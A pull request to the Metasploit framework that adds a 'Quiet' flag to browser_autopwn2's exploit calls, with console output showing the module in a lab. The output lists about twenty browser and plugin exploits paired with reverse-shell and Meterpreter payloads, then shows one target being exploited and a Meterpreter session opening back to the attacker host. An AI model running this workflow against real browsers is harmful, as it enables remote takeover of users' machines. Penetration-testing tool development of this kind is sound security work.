### PR TITLE
Make exploits quiet

### DIFF
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -458,6 +458,7 @@ module Msf
         m.exploit_simple(
           'LocalInput'  => nil,
           'LocalOutput' => nil,
+          'Quiet'       => true,
           'Target'      => 0,
           'Payload'     => m.datastore['PAYLOAD'],
           'RunAsJob'    => true


### PR DESCRIPTION
My output after this change:

```
msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf auxiliary(browser_autopwn2) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 7.400843
[*] Starting the payload handler...
[*] Using URL: http://172.16.158.1:8080/Hn4amlnaDDMs

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 2      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 3      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_tostring_console_injection      [*] Starting the payload handler...
   firefox/shell_reverse_tcp on 4442
 5      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 6      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 7      Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 18     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444
 19     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 21     Normal     adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://172.16.158.1:8080/Hn4amlnaDDMs
[*] Server started.
[*] 172.16.158.132   browser_autopwn2 - Gathering target information.
[*] 172.16.158.132   browser_autopwn2 - Sending HTML response.
[*] 172.16.158.132   adobe_flash_hacking_team_uaf - Request: /TrRSZx/EBlMui/
[*] 172.16.158.132   adobe_flash_hacking_team_uaf - Sending HTML...
[*] 172.16.158.132   adobe_flash_hacking_team_uaf - Request: /TrRSZx/EBlMui/mywp.swf
[*] 172.16.158.132   adobe_flash_hacking_team_uaf - Sending SWF...
[*] 172.16.158.132   ms14_064_ole_code_execution - Sending exploit...
[*] 172.16.158.132   ms14_064_ole_code_execution - Sending VBS stager
[*] 172.16.158.132   wellintech_kingscada_kxclientdownload - Requested: /jYEjW/iHGemM/
[*] 172.16.158.132   wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:2005) at 2015-07-14 16:59:58 -0500

```
